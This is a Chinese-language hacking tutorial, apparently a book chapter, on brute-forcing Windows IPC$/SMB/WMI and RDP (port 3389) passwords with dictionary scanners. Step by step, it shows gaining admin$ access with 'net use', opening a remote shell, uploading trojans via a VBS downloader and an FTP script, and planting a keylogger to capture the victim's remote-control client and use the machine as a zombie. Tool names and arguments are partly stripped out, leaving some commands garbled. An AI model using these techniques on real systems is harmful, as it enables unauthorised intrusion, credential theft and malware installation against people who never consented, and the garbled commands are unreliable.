chanong 7.1 密码扫描准备工作
密码扫描之前需要做一些准备工作。 收集的信息越多,成功获取内网服务器权限的可能性就越大。 例如,在获得一定权限后,我们可以通过电子邮件帐户等信息收集社会工程密码,对用户密码进行模式分析,生成社会工程字典。
1.确定需要扫描的IP地址或IP地址范围
2. 收集用户名和密码。 收集用户名和密码是很常见的。 然而在内网上,很多用户喜欢使用个性化的名字来登录,所以收集一些用户名是有必要的。 密码字典的安排尤其重要,并且可以包括网站使用情况。 您通过的密码、在社会工程数据库中查到的密码电子邮件地址或用户名、公司名称、电话号码、出生日期、手机号码、QQ号码等。
3. 编辑密码和密码短语配置文件
7.2 扫描密码使用示例
密码扫描攻击主要针对某个IP地址或者某个网段进行密码扫描。 本质是尝试通过139、445等端口建立连接。它使用Dos命令“net use \\\admin$”“/u:user”,它只是通过程序实现的。 下面的案例使用扫描软件扫描密码,扫描密码后成功实现控制。
1. 设置
直接运行一般只需要设置起始IP和结束IP即可。 其他设置默认即可,如图1所示。
图1 设置
&阐明
①如果你在肉鸡上精细管理扫描,由于语言版本不同,如果操作系统不支持中文显示,可能会显示为乱码。 这个时候就只能根据熟悉程度来进行设置了。 在这种情况下,它是在英文操作系统中使用的。 有些汉字显示为“?” 其运行界面,但不影响扫描使用,如图2所示。
图2 乱码显示
② 扫描方式有IPC、SMB、WMI三种。 第一种和第三种方法对于扫描密码比较有效,第二种主要用于扫描共享文件。 使用IPC$,可以与目标主机建立空连接,无需用户名和密码,还可以获取目标主机上的用户列表。 SMB(服务器消息块)协议是一种 IBM 协议,用于在计算机之间共享文件、打印机、串行端口等。 SMB协议可以使用在的TCP/IP协议之上,也可以使用在IPX、IPX等其他网络协议之上。
③WMI(管理规范)是核心管理技术。 作为一种规范和基础设施,WMI 可以访问、配置、管理和监控几乎所有资源。 例如,用户可以在远程计算机上启动进程; 设置将进程设置为在特定日期和时间运行; 远程启动计算机; 获取本地或远程计算机上已安装程序的列表; 查询本地或远程计算机的事件日志等。 一般来说,在本地计算机上执行的WMI操作也可以在远程计算机上执行,只要用户具有该计算机的管理员权限即可。 如果用户对远程计算机具有权限并且远程计算机支持远程访问,则用户可以连接到远程计算机并执行他或她具有适当权限的操作。
2. 执行扫描
单击运行界面中的“开始”按钮或单击左侧窗口下方第一个按钮(如果显示乱码)开始扫描,如图3所示。
图3 扫描密码
&阐明
① 扫描密码与字典有关。 原理就是将字典中的密码与实际密码进行比较。 如果相同则可以建立连接,即破解成功。 破解成功后会显示如下。
②词典文件为.dic,用户文件为.dic。 词典文件和用户文件的内容可以根据实际情况进行修改。
③扫描完成后,会在程序当前目录下生成一个.txt文件,该文件记录了扫描结果,如图4所示。
图4 扫描记录文件
④还有一些辅助功能,例如右键后可以执行“cmd”命令,左键后可以执行“连接”、“打开远程登录”、“映射网络驱动器”等命令,如图5所示。
图辅助功能
3. 实施控制
在Dos命令提示符下输入“net use \\221.*.*.*\admin$ "" /u:”命令,获取主机的管理员权限。 命令执行成功,如图6所示。
4.执行命令
输入“\\221.*.*.* cmd”命令即可得到1,如图7所示。
图7 获取
&阐明
①上述两个步骤可以通过在Dos命令提示符下直接输入“\\ –u – cmd”来合并。 例如上例中,可以输入“\\221.*.*.* -u - cmd”命令来获取Dos下的Shell。
② 某些情况下,“\\ -u - cmd”命令无法正常执行。
5.从远程端检查受感染计算机的端口开放状态
使用“sfind -p 221.*.*.*”命令查看远程主机的端口开放状态。 主机仅开放4899端口,如图8所示。
图8 查看端口开放状态
6.上传文件
此处执行文件下载命令,上传一些工具软件或木马软件到被攻击计算机,如图9所示。
图9 上传文件
&阐明
①您可以使用以下vbs脚本命令来上传文件。
回显:if ..count^dl.vbe
echo set aso=.("adodb."):set web=(".") >>dl.vbe
echo web.open "get",.(0),0:web.send:if web.^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.:aso. .(1),2:以>>dl.vbe结尾
dl.vbe.exe
② 如果执行vbs脚本无法上传文件,可以通过执行ftp命令上传文件。 ftp命令如下:
回显打开 192.168.1.1 >b
回显 ftp>>b
回显 ftp>>b
回显箱>>b
echo 获取.exe >>b
回声再见>>b
ftp -s:b
7.并查看主机的基本信息
执行“info”即可查看受感染计算机的基本信息。 该计算机的操作系统为2000,如图10
图10 查看主机基本信息
8.执行渗透
这种情况下,对方的电脑由于安装了,所以很有可能保留一些控制信息。 通过“开始”-“程序”-“v2.2”-“”打开.0版本的客户端控制器,有两个IP地址,如图11,但连接密码未知。 安装键盘记录器,等待用户连接,并监控用户的键盘记录器。 到时候,用户的控制终端就可以当肉鸡用了。 这肉鸡品质非常高。
图11 获取控制端信息
9. 总结
此时,扫描工具软件扫描主机密码,并配合其他命令成功控制扫描弱密码的计算机。 事实上,在这种情况下,该密码并不被认为是弱密码,而是使用受控计算机的密码作为扫描密码。 有时像一只优秀的肉鸡一样控制一大片计算机。
7.3 使用扫描3389密码
3389终端攻击主要通过3389破解login()来实现,3389破解login是微软针对远程终端服务(3389)开发的测试产品。 后来有人对其进行了一些修改,可以用来破解3389密码; 其核心原理是使用字典配合远程终端登录来尝试登录,一旦登录成功则认为破解成功。 破解的成功与否主要取决于字典的强度和时间的长短。 成功进入内网后,可以使用此方法穿透内网3389服务器。 这种方法对于抵御2000次攻击比较有效。
1.安装软件
第一次运行时需要安装,即直接运行.exe程序即可。 如果无法正常运行,需要先运行“-U”命令卸载组件,然后重新运行.exe。 操作成功后,会提示安装组件、解压组件、注册组件成功,如图12所示。
图12 安装程序
2.找到开放3389的IP地址
在Dos提示符下输入“sfind -p 220.*.*.*”检测端口开放情况,如图13所示。
图13 检测3389端口
3. 构建词典文件
构建字典文件.txt,并将破解的密码添加到.txt文件中。 每个密码占据单独的一行,并且行尾没有空格。 编辑完成后如图14所示。
图14 构建字典文件
4.编辑破解命令
如果您只是破解单个IP地址,破解命令格式为“ip -w .txt”。 如果您要破解多个IP地址,可以将IP地址组织到一个文件中,每个IP地址占一行。 并且行尾没有空格,保存为ip.txt,然后编辑一个批处理命令,如图15所示。
图15 编辑破解命令
&阐明
(1)原程序中.exe可以改为任意名称,.txt也可以改为任意名称。
(2)如果要破解多个IP地址,字典文件不能太大,否则破解时间会很长。 建议破解单个IP地址。
5.破解3389密码
运行批处理命令后,远程终端破解程序开始破解。 它会使用字典中的密码一一尝试登录,但程序会自动输入密码,如图16所示。程序破解过程中不要人工干预,让程序自动进行。 裂缝。
图16 破解密码
6.破解成功
破解成功后,程序会自动结束,显示破解的密码以及破解密码所需的时间,如图17所示。
图17 密码破解成功
&阐明
(1)破解3389终端密码后,不会生成日志文件。 破解后的密码将显示在Dos窗口中。 一旦Dos窗口关闭,所有结果将不会被保存。
(2)如果3389终端密码在多个IP地址上被破解,程序会尝试破解所有IP地址然后停止。
(3)3389终端密码对应的用户只能破解,对其他用户无能为力。
7. 使用密码和用户登录
运行mstsc.exe打开终端连接器,输入IP地址进行连接,在3389连接界面输入刚才破解的密码和用户。 连接成功,如图18所示。
图18 进入远程终端桌面
八、总结
本例中,使用一个程序来破解远程终端的密码(3389)。 只要字典足够强,时间足够,如果对方不采取IP地址登录限制等安全措施,理论上是可以破解密码的。 不过,微软最后升级补丁后,这种方法只对2000有效,对2003及以上版本效果较差。 应对3389远程终端密码破解的安全措施是建立IP地址信任连接,或者使用某些软件限制仅某些IP地址访问远程终端。
7.5 使用Fast RDP Brute暴力破解3389密码
1、软件介绍
Fast RDP Brute是俄罗斯Roleg公司开发的一款暴力破解工具。 主要用于扫描远程桌面连接中的弱密码。 官网下载地址,运行软件后的界面如图19所示。
图19 程序主界面
2. 设置主要参数
(1)Max:设置扫描线程数。 默认为1000,一般不需要修改。
(2)扫描:设置超时时间,默认为2000,一般不需要修改。
(3):设置线程超时时间,默认为60000,一般不需要修改。
(4) 扫描端口:根据实际情况设置要扫描的端口。 默认为3389、3390、3391。在实际扫描过程中,如果扫描到已知的IP和端口,建议删除多个端口,如对方端口为3388,则保留3388即可。
(5)扫描IP:设置扫描的IP范围
(6)用户名和密码可以在文件夹中的user.txt和pass.txt文件中自行设置。 如图20所示,默认的user.txt包含俄语管理员,一般不用,可以根据实际情况设置。
图20 设置用户名密码字典进行暴力破解
3. 局域网扫描测试
为了这次测试,搭建了两个平台。 扫描主机的IP地址为“192.168.148.128”; 扫描到的主机IP地址为“192.168.148.132”,操作系统为。 打开端口 3389。在服务器上创建新的测试和用户。 ,并将设置的密码复制到扫描字典中,点击“开始扫描”进行扫描,扫描结果如图21所示。
注意:
(1) 192.168.148.132服务器上必须启用3389。
(2)在扫描服务器上执行mstsc命令,输入IP地址192.168.148.132进行3389登录测试,看看网络是否可以访问。 如果无法访问网络,则扫描无效。
图 21 扫描结果
四、总结与反思
(1)虽然本软件允许多个用户同时扫描,但一旦得到一个结果,软件就会停止扫描。对于多用户扫描,得到扫描结果后,可以删除已扫描的用户并继续扫描,或扫描单个用户。
(2)当扫描时间或连接数较大时,会显示过多错误。如图22
图22 扫描错误
(3) 该软件可以扫描单个用户的已知密码。 获取内网权限后,可以扫描全网开放到3389的主机来获取权限。
(4) 3389密码暴力破解测试也在另一款软件“V4.2 RC”上在线进行。 测试环境同上,实际测试结果无法破解。
网络攻防实践研究:MySQL数据库攻防
¥98.1
买
从初学者到精通
¥99.2
买
网络攻防实践研究:漏洞利用与权限提升
¥121.6
买
微信扫一扫打赏
支付宝扫一扫打赏
